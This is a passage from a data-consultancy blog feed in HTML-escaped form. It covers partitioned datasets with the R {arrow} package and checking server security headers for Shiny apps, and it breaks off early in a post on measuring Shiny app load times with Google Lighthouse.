&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;taxi-data
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#79c0ff"&gt;year&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2018&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#79c0ff"&gt;month&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;01&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; file01.parquet
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#79c0ff"&gt;month&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;02&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; file02.parquet
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; file03.parquet
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ...
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#79c0ff"&gt;year&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2019&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#79c0ff"&gt;month&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;01&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ...
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;See the excellent vignette on
&lt;a href="https://arrow.apache.org/docs/r/articles/dataset.html" rel="external"&gt;datasets&lt;/a&gt; in the
{arrow} package for more details.&lt;/p&gt;
&lt;h4 id="example-partitioning"&gt;Example: Partitioning&lt;/h4&gt;
&lt;p&gt;Parquet files aren’t the only files we can partition. We can also use
the same concept with CSV files. For example,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tmp_dir &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tempdir&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;write_dataset&lt;/span&gt;(palmerpenguins&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;penguins,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; path &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; tmp_dir,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; partitioning &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;species&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; format &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;csv&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This looks like&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;list.files&lt;/span&gt;(tmp_dir, recursive &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;, pattern &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;\\.csv$&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;species=Adelie/part-0.csv&amp;#34; &amp;#34;species=Chinstrap/part-0.csv&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [3] &amp;#34;species=Gentoo/part-0.csv&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;You can also partition using the &lt;code&gt;group_by()&lt;/code&gt; function from {dplyr}&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;palmerpenguins&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;penguins &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dplyr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;group_by&lt;/span&gt;(species) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;write_dataset&lt;/span&gt;(path &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; tmp_dir, format &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;csv&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In my opinion, while it makes conceptual sense to partition CSV files,
in practice it’s probably not worthwhile. If you are partitioning CSV files
to get speed benefits, you might as well use parquet.&lt;/p&gt;
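&lt;p&gt;For completeness, a partitioned CSV data set can be read back with &lt;code&gt;open_dataset()&lt;/code&gt; by setting &lt;code&gt;format = &amp;#34;csv&amp;#34;&lt;/code&gt;. The sketch below uses the built-in &lt;code&gt;airquality&lt;/code&gt; data and a made-up directory name, and assumes {dplyr} is installed:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;library(&amp;#34;arrow&amp;#34;)
# Write one folder of CSV files per month (csv_dir is a made-up location)
csv_dir = file.path(tempdir(), &amp;#34;airquality-csv&amp;#34;)
write_dataset(airquality, path = csv_dir,
              partitioning = &amp;#34;Month&amp;#34;, format = &amp;#34;csv&amp;#34;)
# The Month column is rebuilt from the folder names (Month=5, Month=6, ...)
may = open_dataset(csv_dir, format = &amp;#34;csv&amp;#34;) |&amp;gt;
  dplyr::filter(Month == 5) |&amp;gt;
  dplyr::collect()
nrow(may)
## [1] 31
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;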
&lt;h3 id="single-files-vs-dataset-apis"&gt;Single files vs dataset APIs&lt;/h3&gt;
&lt;p&gt;When reading in data using Arrow, we can either use the &lt;strong&gt;single&lt;/strong&gt; file
functions (these start with &lt;code&gt;read_&lt;/code&gt;) or use the dataset API (these start
with &lt;code&gt;open_&lt;/code&gt;).&lt;/p&gt;
&lt;p&gt;For example, using &lt;code&gt;read_csv_arrow()&lt;/code&gt; reads the CSV file directly into
memory. If the file is particularly large, then we’ll run out of memory.
One thing to note is the &lt;code&gt;as_data_frame&lt;/code&gt; argument. By default this is
set to &lt;code&gt;TRUE&lt;/code&gt;, meaning that &lt;code&gt;read_csv_arrow()&lt;/code&gt; will return a &lt;code&gt;tibble&lt;/code&gt;.
The upside of this is that we have a familiar object. The downside is
that it takes up more room than Arrow’s internal data representation (an
&lt;a href="https://arrow.apache.org/docs/r/articles/data_objects.html?q=table#tables" rel="external"&gt;Arrow
Table&lt;/a&gt;).&lt;/p&gt;
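&lt;p&gt;A quick sketch of the difference, using a small temporary CSV file written from &lt;code&gt;mtcars&lt;/code&gt; (the file and object names are only for illustration):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;library(&amp;#34;arrow&amp;#34;)
# A small CSV file to read back in
csv_file = tempfile(fileext = &amp;#34;.csv&amp;#34;)
write.csv(mtcars, csv_file, row.names = FALSE)
# Default (as_data_frame = TRUE): the result is a tibble
cars_df = read_csv_arrow(csv_file)
# as_data_frame = FALSE: the result stays as an Arrow Table
cars_tab = read_csv_arrow(csv_file, as_data_frame = FALSE)
inherits(cars_df, &amp;#34;data.frame&amp;#34;)
inherits(cars_tab, &amp;#34;Table&amp;#34;)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Both checks should return &lt;code&gt;TRUE&lt;/code&gt;. Keeping the data as an Arrow Table is mostly worthwhile when further {dplyr} steps will be applied before calling &lt;code&gt;collect()&lt;/code&gt;.&lt;/p&gt;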
&lt;p&gt;This blog post by &lt;a href="https://francoismichonneau.net/2022/10/import-big-csv/" rel="external"&gt;François
Michonneau&lt;/a&gt; goes
into far more detail, and discusses the R and Python implementations of
the different APIs.&lt;/p&gt;
&lt;h3 id="acknowledgements"&gt;Acknowledgements&lt;/h3&gt;
&lt;p&gt;This blog was motivated by the excellent &lt;a href="https://posit-conf-2023.github.io/arrow/" rel="external"&gt;Arrow
tutorial&lt;/a&gt; at Posit Conf 2023,
run by Steph Hazlitt and Nic Crane. The NYC dataset came from that
tutorial, and a number of the ideas that I explored were discussed with
the tutorial leaders. I also used a number of resources found on various
corners of the web. I’ve tried to provide links, but if I’ve missed any,
let me know.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/arrow-reading-writing-feather-hive-parquet/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Security Headers for Shiny Applications</title><link>https://www.jumpingrivers.com/blog/shiny-security-server-headers/</link><pubDate>Thu, 11 Jan 2024 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/shiny-security-server-headers/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/shiny-security-server-headers/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/shiny-security-server-headers/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;!-- Just have "Server header in a box on excel draw" --&gt;
&lt;p&gt;Over the last few years, we have been performing audits on Posit
set-ups, Shiny Applications and general R set-ups. One of our standard
checks is to examine the server headers of a Shiny Server. Numerous
websites do this check for you, but as we have an R-based/Quarto
workflow, it was helpful to write a quick &lt;a href="https://github.com/jumpingrivers/serverheaders" rel="external"&gt;R
package&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;The package isn’t on CRAN, but is on the R-universe, so installing is
straightforward&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install.packages&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;serverHeaders&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; repos &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;https://jumpingrivers.r-universe.dev&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;https://cloud.r-project.org&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;There are only a couple of exported functions. The core function is
&lt;code&gt;check()&lt;/code&gt;. As an example, let’s use
&lt;a href="https://jumpingrivers.com/" rel="external"&gt;jumpingrivers.com&lt;/a&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# check returns an invisible data frame of results&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;serverHeaders&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;check&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;jumpingrivers.com&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## ── Checking Server ──&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## ✔ Status code: 301 → 301 → 200&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## ✔ SSL available&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## ✔ SSL redirection successful: http -&amp;gt; https&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## ✔ content-security-policy: Policy present but not parsed&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## ✔ content-type: charset set&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## ✔ permissions-policy: Value present but not verified&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## ✔ referrer-policy: Acceptable setting found&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## ✔ strict-transport-security: max_age = 365 days and is greater than 1 year&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## ✔ x-content-type-options: Acceptable setting found&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## ✔ x-frame-options: Acceptable setting found&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The output to the console highlights key server headers that we are
interested in. Of course, the definition of &lt;em&gt;key&lt;/em&gt; is open to a lot of
discussion, but we just used
&lt;a href="https://securityheaders.com/" rel="external"&gt;securityheaders.com&lt;/a&gt; for guidance.&lt;/p&gt;
&lt;h3 id="comments-on-jumpingriverscom"&gt;Comments on jumpingrivers.com&lt;/h3&gt;
&lt;p&gt;Before we go further, it’s worth noting that a few years ago we decided
to move from WordPress to a static site generator, Hugo. We made this
decision because:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;static sites are faster;&lt;/li&gt;
&lt;li&gt;static sites are easier to maintain;&lt;/li&gt;
&lt;li&gt;our previous site (WordPress) had to be constantly updated; dealing
with numerous WordPress plugins always worried us - too much
for what is essentially a simple site.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;One significant consequence of having a static site is that the
attack surface is much smaller.&lt;/p&gt;
&lt;h4 id="status-codes"&gt;Status codes&lt;/h4&gt;
&lt;p&gt;The first header is the status code. You’re probably familiar with a
status code of 200 indicating a successful request, and the dreaded 404
indicating a missing page. However, when we look at
&lt;a href="https://www.jumpingrivers.com" rel="external"&gt;jumpingrivers.com&lt;/a&gt;, we actually got
three status codes: &lt;code&gt;301&lt;/code&gt;, &lt;code&gt;301&lt;/code&gt;, and then the magical &lt;code&gt;200&lt;/code&gt;. This is
fairly standard. What happens is that jumpingrivers.com is actually the
same as &lt;code&gt;http://jumpingrivers.com&lt;/code&gt;. This redirects (code &lt;code&gt;301&lt;/code&gt;) to
&lt;code&gt;https://jumpingrivers.com&lt;/code&gt; which redirects to
&lt;code&gt;https://www.jumpingrivers.com&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;A “bad” site wouldn’t redirect to the “https” version.&lt;/p&gt;
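&lt;p&gt;As a rough sketch of how the redirect chain could be inspected directly from R, the snippet below uses the {httr} package. This is an assumption on our part and not necessarily what {serverHeaders} does internally; the helper names &lt;code&gt;format_chain()&lt;/code&gt; and &lt;code&gt;status_chain()&lt;/code&gt; are hypothetical.&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code class="language-r" data-lang="r"&gt;# Collapse the status codes of a redirect chain into a single string
format_chain = function(codes) {
  paste(codes, collapse = " → ")
}

# Follow the redirects for a URL and report every status code on the way.
# Needs the {httr} package and network access.
status_chain = function(url) {
  response = httr::GET(url)
  # all_headers has one entry per response in the redirect chain
  codes = vapply(response$all_headers, function(h) as.integer(h$status), integer(1))
  format_chain(codes)
}

# status_chain("http://jumpingrivers.com")
&lt;/code&gt;&lt;/pre&gt;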
&lt;h4 id="content-security-policy"&gt;Content security policy&lt;/h4&gt;
&lt;p&gt;We’ve covered &lt;a href="https://www.jumpingrivers.com/blog/content-security-policy-shiny-posit-connect/" rel="external"&gt;Content Security
Policies&lt;/a&gt;
(or CSP) in previous blog posts. Being explicit about where external
resources, e.g. JavaScript, are loaded from gives applications an
extra layer of security.&lt;/p&gt;
&lt;p&gt;For example, we can state that JavaScript can only be loaded from
jumpingrivers.com and example.com. Any JavaScript resource that is
loaded from another site is automatically blocked by the browser. This
safeguards against attacks such as cross-site scripting.&lt;/p&gt;
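&lt;p&gt;To make this concrete, here is a minimal sketch of how such a policy value could be assembled in R. The function name &lt;code&gt;csp_script_src()&lt;/code&gt; is hypothetical; the resulting string would be sent by the web server as the value of the &lt;code&gt;Content-Security-Policy&lt;/code&gt; header.&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code class="language-r" data-lang="r"&gt;# Build a script-src directive that only allows the listed origins
csp_script_src = function(origins) {
  paste("script-src", paste(origins, collapse = " "))
}

csp_script_src(c("https://jumpingrivers.com", "https://example.com"))
## [1] "script-src https://jumpingrivers.com https://example.com"
&lt;/code&gt;&lt;/pre&gt;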
&lt;p&gt;As jumpingrivers.com is a static site (we use Hugo), we don’t need to
worry about cross-site scripting quite as much; it’s probably overkill.
However, adding CSP to our site has highlighted exactly where we load
external resources from and has encouraged us to keep resources local
where possible.&lt;/p&gt;
&lt;h4 id="permissions-policy"&gt;Permissions policy&lt;/h4&gt;
&lt;p&gt;A permissions policy is similar to a CSP. Essentially, we specify the
browser features that our website is allowed to use. For example, would we expect to
use a camera or microphone? Again, for our static site this is overkill,
but for a Shiny application it’s certainly something you should
consider.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Want to ensure that your application or dashboard follows the latest standards? You might benefit from our &lt;a href="https://www.jumpingrivers.com/data-science/visualisation-and-dashboards/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2024-shiny-security-server-headers"&gt;Shiny health check&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h4 id="referrer-policy"&gt;Referrer policy&lt;/h4&gt;
&lt;p&gt;When someone clicks a link on a site that takes them to another domain,
the destination site receives information about where that user came
from. This is how we get website analytics about our site traffic.&lt;/p&gt;
&lt;p&gt;This isn’t too important for a site like jumpingrivers.com as we don’t
have anything private on our site - everything is open to the world!
However, if your URL contains potentially private information that you
don’t want to be leaked, e.g. example.com/private-info, then you should
set the Referrer Policy.&lt;/p&gt;
&lt;p&gt;For jumpingrivers.com, we set it to &lt;code&gt;no-referrer-when-downgrade&lt;/code&gt;. This
means when going from https to http, we won’t send the referrer header.
Other than that, we’ll send the full path.&lt;/p&gt;
&lt;h4 id="strict-transport-security"&gt;Strict transport security&lt;/h4&gt;
&lt;p&gt;This header informs browsers that a site should only be accessed using
HTTPS. Once set, any future visits will automatically convert http to
https. Remember from the status codes that typing jumpingrivers.com
into a browser first resolves to
&lt;a href="http://jumpingrivers.com" rel="external"&gt;http://jumpingrivers.com&lt;/a&gt;, so this header (after the first visit) closes
that gap.&lt;/p&gt;
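&lt;p&gt;The header carries a &lt;code&gt;max-age&lt;/code&gt; directive, which is given in seconds. As a small sketch, a header value can be converted to days as follows. The helper &lt;code&gt;hsts_max_age_days()&lt;/code&gt; and the example header value are hypothetical, and this is not taken from {serverHeaders}.&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code class="language-r" data-lang="r"&gt;# Convert the max-age directive of a strict-transport-security value to days.
# Returns NA (with a warning) if the value has no max-age directive.
hsts_max_age_days = function(value) {
  seconds = as.numeric(sub(".*max-age=([0-9]+).*", "\\1", tolower(value)))
  seconds / (60 * 60 * 24)
}

hsts_max_age_days("max-age=31536000; includeSubDomains")
## [1] 365
&lt;/code&gt;&lt;/pre&gt;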
&lt;h4 id="x-content-type-options"&gt;X content type options&lt;/h4&gt;
&lt;p&gt;This stops a browser from trying to MIME-sniff the content type. This
should be set to &lt;code&gt;x-content-type-options: nosniff&lt;/code&gt;.&lt;/p&gt;
&lt;h4 id="x-frame-options"&gt;X frame options&lt;/h4&gt;
&lt;p&gt;This tells the browser whether or not you want to allow your site to be
framed. At jumpingrivers.com this is set to &lt;code&gt;DENY&lt;/code&gt;.&lt;/p&gt;
&lt;h3 id="shiny-servers"&gt;Shiny servers&lt;/h3&gt;
&lt;p&gt;The {serverHeaders} package checks common security-related headers.
There are certainly others, but the headers described above are
the important ones. Many Shiny applications we work with
contain sensitive data, help make business-critical decisions and/or are
fundamental to a business process. As such, spending some time securing
your server is to be recommended (a little bit of understatement here).&lt;/p&gt;
&lt;h3 id="acknowlegements"&gt;Acknowledgements&lt;/h3&gt;
&lt;p&gt;This &lt;a href="https://github.com/jumpingrivers/serverheaders" rel="external"&gt;package&lt;/a&gt; is based
on a package originally created by Bob Rudis -
&lt;a href="https://github.com/hrbrmstr/hdrs" rel="external"&gt;hdrs&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/shiny-security-server-headers/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Effect of Shiny Widgets with Google Lighthouse</title><link>https://www.jumpingrivers.com/blog/shiny-app-start-up-google-lighthouse-part-3/</link><pubDate>Thu, 14 Dec 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/shiny-app-start-up-google-lighthouse-part-3/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/shiny-app-start-up-google-lighthouse-part-3/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/shiny-app-start-up-google-lighthouse-part-3/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Part 1: &lt;a href="https://www.jumpingrivers.com/blog/shiny-app-start-up-google-lighthouse-part-1/" rel="external"&gt;Using Google Lighthouse for Web Pages&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Part 2: &lt;a href="https://www.jumpingrivers.com/blog/shiny-app-start-up-google-lighthouse-part-2/" rel="external"&gt;Analysing Shiny App start-up Times with Google Lighthouse&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Part 3: Effect of Shiny Widgets with Google Lighthouse (This post)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This is the third blog in our series on the &lt;a href="https://developer.chrome.com/docs/lighthouse/overview/" rel="external"&gt;Google Lighthouse&lt;/a&gt; tool. In &lt;a href="https://www.jumpingrivers.com/blog/shiny-app-start-up-google-lighthouse-part-1/" rel="external"&gt;Part 1&lt;/a&gt;, we looked at what Lighthouse is and how it can be used to assess the start-up times of webpages, and in &lt;a href="https://www.jumpingrivers.com/blog/shiny-app-start-up-google-lighthouse-part-2/" rel="external"&gt;Part 2&lt;/a&gt;, we used Lighthouse to test Shiny apps and performed some analysis on the &lt;a href="https://posit.co/blog/time-to-shiny/" rel="external"&gt;2021 Shiny App Contest&lt;/a&gt; submissions. In this final part I am going to create a few Shiny Apps with different content and use Lighthouse to see the differences. I have creatively named my apps app1, app2, &amp;hellip;, app6.&lt;/p&gt;
&lt;h3 id="the-apps"&gt;The Apps&lt;/h3&gt;
&lt;p&gt;The default app (app1) I&amp;rsquo;m using as a baseline is &lt;code&gt;shiny::runExample(&amp;quot;01_hello&amp;quot;)&lt;/code&gt;. It is just a simple app with a slider input and a histogram, where the slider input dictates the number of histogram bins. It looks like this:&lt;/p&gt;
&lt;img src="img/app1.png" alt="Image of the first app. This app contains a histogram and a slider to the left allowing you to select the number of bins in the histogram." style="width: 80%; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;To actually see what factors cause changes in load time, I&amp;rsquo;m going to be building upon this app incrementally. So, app2 is identical to the first, except that we have a &lt;a href="https://plotly.com/r/histograms/" rel="external"&gt;{plotly} histogram&lt;/a&gt; instead of a base &lt;code&gt;hist()&lt;/code&gt; plot.&lt;/p&gt;
&lt;p&gt;For app3 I am adding a simple data table using &lt;a href="https://shiny.posit.co/r/reference/shiny/1.7.3/rendertable" rel="external"&gt;&lt;code&gt;shiny::renderTable()&lt;/code&gt;&lt;/a&gt; on top of the second app. App 3 looks like this:&lt;/p&gt;
&lt;img src="img/app3.png" alt="Image of the third app. This app contains a histogram and a slider to the left allowing you to select the number of bins in the histogram. It also now has a table below with columns titled 'eruptions' and 'waiting'" style="width: 80%; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;App4 is the same as the third, except that the data table is replaced with a &lt;a href="https://rstudio.github.io/DT/shiny.html" rel="external"&gt;{DT} data table&lt;/a&gt; using &lt;code&gt;DT::renderDT()&lt;/code&gt; and &lt;code&gt;DT::DTOutput()&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;For app5 I have added a date input widget in the sidebar. In the 6th and final app, I have changed the {plotly} histogram to a reactive object (so it&amp;rsquo;s not computed twice) and rendered it twice, in the original place and in the sidebar, to see if that has any impact on the scores. The final app looks like this:&lt;/p&gt;
&lt;img src="img/app6.png" alt="Image of the last app. This app contains a histogram and a slider to the left allowing you to select the number of bins in the histogram. It also now has a table below with columns titled 'eruptions' and 'waiting' which is a dt table, and there is an option to input the date below the bin slider, and another copy of the histogram beneath that." style="width: 80%; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;So now I have a series of 6 apps of increasing complexity. I can now test what impact each added component has on the Lighthouse reports. I will test each app 10 times to make the results more reliable and so we can see the variance in the Lighthouse reports. The main things I&amp;rsquo;m looking at from the reports are the following Lighthouse metrics (covered in &lt;a href="https://www.jumpingrivers.com/blog/shiny-app-start-up-google-lighthouse-part-1/" rel="external"&gt;part 1&lt;/a&gt; of the series):&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;FCP (First Contentful Paint - ms)&lt;/li&gt;
